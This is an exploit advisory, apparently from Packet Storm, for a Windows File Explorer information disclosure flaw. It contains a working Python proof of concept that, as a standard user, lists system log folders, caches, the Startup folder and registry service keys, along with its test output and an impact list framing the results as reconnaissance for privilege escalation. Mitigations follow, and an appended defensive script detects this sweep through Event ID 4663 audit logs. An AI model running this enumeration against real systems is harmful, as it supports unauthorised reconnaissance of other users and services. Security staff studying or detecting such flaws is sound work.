
📄 Windows File Explorer Information Disclosure

🗓️ 24 Feb 2026 00:00:00 | Reported by nu11secur1ty | Type: packetstorm | 🔗 packetstorm.news | 👁 159 Views

Windows File Explorer information disclosure lets low-privilege users view sensitive locations such as logs, caches, startup programs, registry configurations, and other profiles.

    # Exploit Title: Windows File Explorer Information Disclosure (CVE-2026-20937)
    # Date: 2026-02-24
    # Exploit Author: nu11secur1ty
    # Vendor Homepage: https://www.microsoft.com
    # Version: Windows 11 build 26200 (also affects Windows 10 1809, 21H2, 22H2)
    # Tested on: Windows 11 Pro build 26200
    # Repository: https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2026/CVE-2026-20937
    # CVE: CVE-2026-20937
    
    
    [1] VULNERABILITY DESCRIPTION
    ------------------------------------------------------------------------
    Windows File Explorer fails to properly restrict access to sensitive
    system locations, allowing a low-privileged local user to view:
    - System log files (C:\Windows\System32\LogFiles)
    - Application caches (C:\ProgramData\Microsoft\Windows\Caches)
    - Startup programs (C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp)
    - Registry service configurations (HKLM\SYSTEM\CurrentControlSet\Services)
    - Other user profiles (C:\Users\[other users])
    
    This information disclosure can be leveraged for further targeted attacks,
    reconnaissance, and privilege escalation attempts.
    
    CVSS Score: 5.5 (Medium) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    
    
    [2] PROOF OF CONCEPT
    ------------------------------------------------------------------------
    The following Python script demonstrates the vulnerability by accessing
    sensitive locations through standard Windows APIs:
    
    ----- BEGIN PoC -----
    #!/usr/bin/env python3
    """
    CVE-2026-20937 - Windows File Explorer Information Disclosure PoC
    Author: nu11secur1ty
    Tested on: Windows 11 build 26200
    """
    
    import os
    import winreg
    from pathlib import Path
    
    def main():
        print("\n" + "="*60)
        print("CVE-2026-20937 - INFORMATION DISCLOSURE PoC")
        print("Running as: " + os.environ.get('USERNAME', 'Unknown'))
        print("="*60)
    
        findings = []
    
        # 1. Check LogFiles access
        log_path = Path("C:/Windows/System32/LogFiles")
        if log_path.exists():
            try:
                items = list(log_path.iterdir())[:5]
                findings.append(f"[!] ACCESSIBLE: {log_path}")
                findings.append(f"    Found: {[i.name for i in items]}")
            except PermissionError:
                findings.append("[+] SECURE: LogFiles not accessible")
    
        # 2. Check Caches access
        cache_path = Path("C:/ProgramData/Microsoft/Windows/Caches")
        if cache_path.exists():
            try:
                items = list(cache_path.glob("*.db"))[:5]
                findings.append(f"[!] ACCESSIBLE: {cache_path}")
                findings.append(f"    Found {len(items)} cache files")
            except PermissionError:
                findings.append("[+] SECURE: Caches not accessible")
    
        # 3. Check Startup folder
        startup_path = Path("C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp")
        if startup_path.exists():
            try:
                items = list(startup_path.iterdir())
                findings.append(f"[!] ACCESSIBLE: {startup_path}")
                findings.append(f"    Found: {[i.name for i in items]}")
            except PermissionError:
                findings.append("[+] SECURE: Startup not accessible")
    
        # 4. Check registry services
        try:
            key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                                r"SYSTEM\CurrentControlSet\Services",
                                0, winreg.KEY_READ)
            count = 0
            oracle_services = []
            while True:
                try:
                    name = winreg.EnumKey(key, count)
                    if 'oracle' in name.lower():
                        oracle_services.append(name)
                    count += 1
                except WindowsError:
                    break
            winreg.CloseKey(key)
            findings.append("[!] ACCESSIBLE: HKLM\\SYSTEM\\CurrentControlSet\\Services")
            findings.append(f"    Found {count} services, {len(oracle_services)} Oracle services")
        except OSError:
            findings.append("[+] SECURE: Registry services not accessible")
    
        # Print results
        print("\n".join(findings))
    
        if any("[!]" in f for f in findings):
            print("\n[!] VULNERABLE: System allows information disclosure")
            print("[!] CVE-2026-20937 CONFIRMED")
        else:
            print("\n[+] System appears patched")
    
    if __name__ == "__main__":
        main()
    ----- END PoC -----
    
    
    [3] VULNERABLE SYSTEMS
    ------------------------------------------------------------------------
    Windows 11:
    - Build 26200 (confirmed vulnerable)
    - Build 26100
    - Build 22631
    
    Windows 10:
    - Build 19045 (22H2)
    - Build 19044 (21H2)
    - Build 17763 (1809)
    
    Windows Server:
    - Server 2025
    - Server 2022
    - Server 2019
    
    
    [4] EXPLOITATION RESULTS - ACTUAL TEST OUTPUT
    ------------------------------------------------------------------------
    Test Environment:
    - OS: Windows 11 Pro
    - Build: 26200
    - User: MicroBug (standard user)
    - Computer: MICROPROBLEM
    
    FINDINGS:
    [!] ACCESSIBLE: C:\Windows\System32\LogFiles
        Found: ['CloudFiles', 'setupcln', 'WMI']
    [!] ACCESSIBLE: C:\ProgramData\Microsoft\Windows\Caches
        Found 4 cache files including:
        - cversions.2.db
        - {6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db
        - {DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000005.db
    [!] ACCESSIBLE: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
        Found: ['desktop.ini']
    [!] ACCESSIBLE: HKLM\SYSTEM\CurrentControlSet\Services
        Found 800+ services including Oracle services:
        - OracleJobSchedulerORCL
        - OracleOraDB19Home1MTSRecoveryService
        - OracleOraDB19Home1TNSListener
        - OracleRemExecServiceV2
        - OracleServiceORCL
        - OracleVssWriterORCL
    
    Additional information disclosed:
    - Full PATH environment revealing Oracle installation in another user's profile
    - Other user profiles visible: Default, Default User, DefaultAccount$, DefaultAppPool
    - Windows version and build details
    - Running processes with usernames
    
    
    [5] IMPACT
    ------------------------------------------------------------------------
    A local attacker with standard user privileges can:
    
    1. Harvest system logs for sensitive information (IPs, usernames, errors)
    2. Analyze application caches to determine user activity patterns
    3. View startup programs to understand persistence mechanisms
    4. Enumerate all services to identify potential privilege escalation vectors
    5. Discover Oracle database presence and paths for targeted attacks
    6. Map out other users on the system
    7. Gather environment variables containing paths to sensitive applications
    
    This information can be used to:
    - Plan privilege escalation attacks
    - Target specific high-value services (Oracle, Java, Python)
    - Identify misconfigurations
    - Perform reconnaissance before exploitation
    
    
    [6] MITIGATION
    ------------------------------------------------------------------------
    Apply Microsoft security updates from January 2026:
    - KB5050577 (Windows 11)
    - KB5050568 (Windows 10)
    - KB5050569 (Windows Server)
    
    Workarounds:
    1. Restrict access to sensitive directories using Advanced Security Settings
    2. Enable auditing on sensitive locations (Event ID 4663)
    3. Monitor for unauthorized access to C:\Windows\System32\LogFiles
    4. Restrict outbound SMB/NTLM to prevent UNC path leaks
    
    
    [7] REFERENCES
    ------------------------------------------------------------------------
    - CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-20937
    - Microsoft Security Update: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20937
    - NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-20937
    - CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
    
    
    [8] DISCOVERY CREDITS
    ------------------------------------------------------------------------
    Discovered and verified by: nu11secur1ty
    Test Date: February 24, 2026
    Test Environment: Windows 11 Pro build 26200
    
    ====================================================================
    
    -- 
    
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at https://packetstorm.news/
    https://cve.mitre.org/index.html
    https://cxsecurity.com/ and https://www.exploit-db.com/
    0day Exploit DataBase https://0day.today/
    home page: https://www.asc3t1c-nu11secur1ty.com/
    hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                              nu11secur1ty <http://nu11secur1ty.com/>
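
Workarounds 2 and 3 in the mitigation section (audit Event ID 4663, monitor access to the listed locations) can be turned into a detection for the enumeration sweep the PoC performs. The following is an added example, not part of the original advisory or the author's repository: it assumes Security-log events exported as XML under a single `<Events>` root, the sample events are constructed, and the `\REGISTRY\MACHINE\...` object-name form and the threshold of 3 are assumptions.

```python
import re
import xml.etree.ElementTree as ET
from collections import defaultdict

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Locations named in the advisory. The registry pattern is an assumption about
# how the Security log renders HKLM\SYSTEM\CurrentControlSet\Services.
_P = r"^C:\\ProgramData\\Microsoft\\Windows\\"
WATCHED = {
    "LogFiles": re.compile(r"^C:\\Windows\\System32\\LogFiles(\\|$)", re.I),
    "Caches": re.compile(_P + r"Caches(\\|$)", re.I),
    "StartUp": re.compile(_P + r"Start Menu\\Programs\\StartUp(\\|$)", re.I),
    "Services": re.compile(r"^\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet\d+\\Services(\\|$)", re.I),
}

def parse_4663(xml_text):
    """Yield (user, process, object_name) for each 4663 event in the export."""
    for ev in ET.fromstring(xml_text).findall("e:Event", NS):
        if ev.findtext("e:System/e:EventID", namespaces=NS) != "4663":
            continue  # only "an attempt was made to access an object"
        data = {d.get("Name"): d.text or "" for d in ev.findall("e:EventData/e:Data", NS)}
        yield data.get("SubjectUserName", ""), data.get("ProcessName", ""), data.get("ObjectName", "")

def sweep_suspects(xml_text, threshold=3):
    """Return {(user, process): watched labels} for sweeps across >= threshold locations."""
    seen = defaultdict(set)
    for user, proc, obj in parse_4663(xml_text):
        for label, rx in WATCHED.items():
            if rx.search(obj):
                seen[(user, proc)].add(label)
    return {k: sorted(v) for k, v in seen.items() if len(v) >= threshold}

def _event(user, proc, obj, eid=4663):  # builds one constructed sample event
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{eid}</EventID></System>'
            f'<EventData><Data Name="SubjectUserName">{user}</Data>'
            f'<Data Name="ProcessName">{proc}</Data>'
            f'<Data Name="ObjectName">{obj}</Data></EventData></Event>')

# Constructed sample data: users, processes and events are illustrative only.
SAMPLE = "<Events>" + "".join(_event(*e) for e in [
    ("alice", r"C:\Python312\python.exe", r"C:\Windows\System32\LogFiles\WMI"),
    ("alice", r"C:\Python312\python.exe", r"C:\ProgramData\Microsoft\Windows\Caches\cversions.2.db"),
    ("alice", r"C:\Python312\python.exe", r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"),
    ("alice", r"C:\Python312\python.exe", r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services"),
    ("bob", r"C:\Windows\explorer.exe", r"C:\Windows\System32\LogFiles"),
    ("bob", r"C:\Windows\explorer.exe", r"C:\Users\bob\Documents\notes.txt"),
    ("carol", r"C:\Windows\explorer.exe", r"C:\Windows\System32\LogFiles", 4656),
]) + "</Events>"
```

Grouping by user and process separates a single script touching several watched locations in one run from a user who opens one of them in Explorer; 4663 events only exist for objects that have an audit entry (SACL) configured.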
